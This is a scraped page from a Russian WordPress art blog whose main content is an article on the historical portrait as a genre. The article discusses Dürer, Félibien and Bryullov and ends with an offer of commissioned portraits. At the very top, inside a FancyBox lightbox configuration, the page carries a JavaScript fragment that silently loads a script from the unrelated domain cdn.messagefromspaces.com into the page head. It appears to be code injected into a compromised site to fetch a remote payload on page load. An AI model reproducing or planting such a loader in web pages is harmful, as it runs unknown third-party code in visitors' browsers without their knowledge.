, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Исторический портрет

Автор: Дмитрий Алмазов | 04 Фев 2014

Исторический портрет Как часто в современном мире, среди бесконечной суеты, мы забываем о своих истоках, о величии поколений нам предшествующих. Человек не может с гордостью и уверенностью смотреть в будущее, если он не знает и не интересуется своим прошлым.

Узнать наше прошлое, нам помогают произведения величайших поэтов, скульпторов, живописцев, дошедшие до наших дней. Благодаря художникам, мы можем окунуться в мир сражений далекой древности, полюбоваться пейзажами любимых мест в далеком прошлом, знать своих героев в лицо. В этом нам помогает самостоятельный жанр изобразительного искусства – исторический портрет.

Термин «портрет» использовали в европейской культуре еще в XII в., однако первым, кто предложил употреблять данный термин для обозначения конкретного человека был французский историк искусства Андре Фелибьен.

Исторический портрет, как самостоятельный жанр искусства, выполняет определенные функции, основной, из которых, является функция памяти. Как говорил знаменитый немецкий живописец, мастер западноевропейского Ренессанса Альбрехт Дюрер «Я пишу, чтобы сохранить образы человеческие после их смерти».

Исторический портрет на заказТемой исторического портрета является личность человека, его индивидуальность. Для отображения всего диапазона качеств личности, его социальной принадлежности, художники часто использовали определенную атрибутику, фон и костюмы, которые служили подсказкой , определяющей моральный облик, профессиональный и социальный статус, религиозную принадлежность позирующего, создавали уникальный подтекст для создания более точного образа.

Однако жанр портрета не имеет четких границ и может переплетаться с элементами других жанров.

Ранее во многих обществах, портреты расценивали как способ обозначения богатства, власти и социального статуса. Они были предназначены не для выставок в музеях, чаще всего они носили более практичный характер и служили, как правило, для украшения дворцов правителей, помещичьих усадеб различных учреждений. Из этого вытекает еще одна функция портрета – как часть быта, которая была неразрывно связана с мебелью, утварью и прочими домашними принадлежностями.

Как и на прочие виды искусства время не могло не оставить свой отпечаток на специфике отражения личности на портрете. С течением времени, с изменением вкусов, с новыми стилистическими чертами  писались новые портреты, отвечающие веяниям новой моды.

Среди представителей этого жанра можно отметить множество талантливый художников, таких как, например, Г. И. Угрюмов, А. Г. Венецианов, Т. Е. Мягков, этот список можно продолжать до бесконечности, поскольку каждый портрет, созданный рукой мастера, несет в себе яркую индивидуальность и неповторимость жанра. Однако, среди замечательных имен, мне бы хотелось особо выделить имя Карла Павловича Брюллова. Творчеством, которого восхищались А. С. Пушкин и Н. В. Гоголь, из-под кисти, которого вышли столь прекрасные шедевры, как «Последний день Помпеи», «Всадница» и многие другие.

Исторический портретОсобое место в творчестве К. П. Брюллова занимает исторический портрет. За свою жизнь он написал около ста двадцати портретов. Его первой картиной в этом жанре было, написанное в 1824 г. «Итальянское утро».

На этой картине нашему взору предстает прекрасная девушка, умывающаяся под струями фонтана. Живописец неповторимо передал красоту юности этой девушки, фигура которой освещена мягкими золотистыми лучами утреннего солнца.

Вклад, который привнес, каждый художник в культурное наследие, дошедшее до наших дней поистине неоценим. Но и в наше время есть немало талантливых художников, которые способны создать не менее прекрасные произведения, достойные восхищения. Я думаю, каждому будет приятно любоваться на портрет своего близкого человека в гостиной, или запечатлеть важнейший момент жизни на холсте. И, кто может знать, возможно пройдут года, пройдут века и наши потомки будут гордится произведениями наших современников.

Заказать исторический портрет по фото Вы можете на странице контакты или по телефону +7(960)134-46-27 (г. Воронеж)

Темы: Картина на заказ, Портрет, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress